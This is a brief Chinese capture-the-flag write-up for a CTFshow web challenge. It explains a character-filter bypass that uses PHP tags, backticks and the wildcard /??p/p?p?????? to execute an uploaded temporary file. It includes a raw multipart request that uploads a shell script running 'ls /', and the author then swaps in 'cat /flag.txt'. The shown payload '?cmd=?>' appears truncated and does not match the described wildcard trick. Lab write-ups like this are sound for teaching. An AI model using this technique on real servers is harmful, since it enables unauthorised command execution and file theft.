CTFshow--web--红包题第二弹

查看源代码，按注释提示，构造参数试试?cmd=aa

    
    
    


    
    
ctf.show_红包题
    
where is the flag?
    
    
    

源码中过滤了很多东西，可以使用的字符：p ` ? / + < > =

通过可用的字符构造cmd=?>

备注：问号?代表一个任意字符，通配符/??p/p?p??????匹配/tmp/phpxxxxxx

构造payload

?cmd=?>

然后bp抓包，修改这几个地方，发现根目录下有flag.txt

POST /?cmd=?>Host: 4947507e-e5ac-452c-8f01-80f5309742d9.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------10242300956292313528205888
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 237

-----------------------------10242300956292313528205888
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#! /bin/sh

ls /
-----------------------------10242300956292313528205888--

修改命令为cat /flag.txt 得到flag